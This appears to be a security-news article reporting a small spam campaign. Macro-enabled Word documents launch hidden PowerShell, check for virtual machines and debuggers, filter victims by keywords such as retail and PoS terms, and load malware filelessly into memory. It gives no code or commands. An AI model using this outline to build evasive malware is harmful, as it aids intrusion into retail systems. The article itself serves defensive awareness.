A while ago, security experts found out a new kink in the tactics of cyber criminals. In order to deliver fileless malware to their targets, hackers are now combining spam campaigns, malicious Word documents, and PowerShell code.
To be precise, none of these techniques is new, however, they have never been used together until now. This means that malware operators are paying closer attention to security research and the work of some of their peers, borrowing techniques from each other in their ever-present struggle to evade detection. The security experts who have discovered this campaign, are saying that it’s relatively small at the moment, having detected only 1,500 of such emails so far.
Cyber criminals deliver infected Word documents to their victims through spam emails. Although Word’s macro feature has been popular as an avenue for delivering malware, there are still countless Microsoft Office installations where Word macros are turned on and will automatically execute when the document is opened. Therefore, in situations where the spam campaign manages to fool users into opening the documents, the malicious macro code will be executed automatically.
According to security researchers, for this campaign, the macro code packed with each malicious document will start a hidden instance of Windows PowerShell, a powerful scripting language added since Windows 7, and then download malicious scripts that will be executed by the PowerShell instance.
Support is included for both 32-bit and 64-bit platforms, and the scripts first initiate a series of tests. They will check if the computer is not a virtual machine, if there are no software debugging apps running, and it will then look for “trigger” words in the computer’s cache and network configuration.
The string check includes good and bad words. If strings like hospital, school, college, nurse, and doctor are discovered, the script will immediately stop from execution. If strings related to shops, stores, and PoS systems are found on the target, the scripts will proceed to download whatever malware family the C&C servers instruct it to download.
As soon as it’s done, the malware is written directly to the PC’s memory, without ever touching the user’s hard drive. Therefore, it won’t be subjected to classic antivirus detection procedures.
According the security experts, the spam campaign has currently targeted users living in USA, Canada, the UK, France, Poland, Germany and Austria.